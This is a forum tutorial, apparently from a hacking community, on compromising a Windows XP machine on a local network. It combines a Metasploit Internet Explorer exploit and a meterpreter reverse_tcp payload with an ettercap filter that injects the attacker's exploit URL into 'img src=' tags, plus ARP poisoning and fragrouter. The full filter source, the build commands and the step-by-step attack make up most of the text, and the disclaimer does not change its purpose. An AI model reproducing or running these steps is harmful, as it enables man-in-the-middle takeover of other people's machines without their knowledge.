Hey again guys

Here we go again!! In this tut I will try to explain how I used metasploit to gain access to a windows XP SP2 box using ettercap filters. A reason somebody might use this way to gain access is because there is no interaction with the victim .

Once again I hold no responsibilities to what people do with this information. DO NOT email me / PM me or post here asking any member of this forum how to use this attack against a real victim!

Now lets begin

First lets fire up metasploit, we will use the nice and easy msfweb for this tut. Go to backtrack >> Penetration >> Metasploit framework3 >> msfweb

Now load up a web browser and go to;

http://127.0.0.1:55555

And you should see metasploits web interface. Now do a search in exploits for "internet". Now for this tut I'm going to use the MS03-020 Internet Explorer Object Type exploit. You can use this one or try others. Select the target explorer and now we can choose a payload. And this ones up to you but for EG I will use the windows/meterpreter/reverse_tcp payload. Now lets setup the hack. for SRVHOST input your own IP and the rest is down to what payload you chose. For the example payload set LHOST to your IP too and then hit exploit.

Next you should get a new screen containing
Code:
*Started reverse handler 
*Using URL: http://192.168.1.64:8080/qp7QmDBnn8q 
*Server started. 
*Exploit running as background job.
*msf exploit(ms03_020_ie_objecttype) >
Open kwrite and paste the url (in your screen lol not the post) and lets move on....

Now lets setup our ettercap filter. You can make your own up or use mine below, In my filter I have chose to attach my url to a "img src=" tag. This is because you can guarantee that every web site viewed by the victim is going to contain this tag. You can play with different filters and all dat

First lets setup a tmp dir to store our crap lol

Code:
mkdir metafilter
cd metafilter
And now cut and paste my filter to kwrite:

Code:
############################################################################
#                                                                          #
#  Metasploit -- metasploit.filter -- filter source file                   #
#                                                                          #
#  By DR_Gr33n. based on code from Irongeek                                # 
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "paste your url here!!!" ");
   replace("IMG SRC=", "paste your url here!!!" ");
   msg("Check Metasploit.\n");
}
Save it as metafilter.filter and close kwrite. Now lets build our filter .......

Code:
etterfilter metafilter.filter -o metafilter.ef
Now we can start our attack.....

Whopps missed fragrouter ...

Code:
fragrouter -B1
Start ettercap

Select unified sniffing

Sniff >> unified sniffing and select your network adaptor

Now lets scan for our target and go to the host list.

Hosts >> Scan for hosts
&
Hosts >> Host List

Select your victims ip and hit the add to target button....

Lets load our filter ...

Filters >> Load a filter

Browse through to our folder /root/metafilter and select our filter "metafilter.ef" and OK

EDIT lol @ purehate yes I know this has been patched a while. Lets not give the whole game away lol think of it as thicko protection.

Now lets start ARP Poisoning the victim....

Mitm >> Arp poisoning and tick the "Sniff remote connections" box and OK

Then Start and Start Sniffing.

Now watch the bottom screen of ettercap until you see "Check Metasploit". and go back to your metasploit webbrowser.

You should now have a session started if the hack has worked. If not try another payload or exploit.

And you are done, pat your self on the back and have fun !!!

Hope I haven't made any mistakes, if I have give me some abuse lol

PS: can a moderator edit the title I added dnsspoof balls !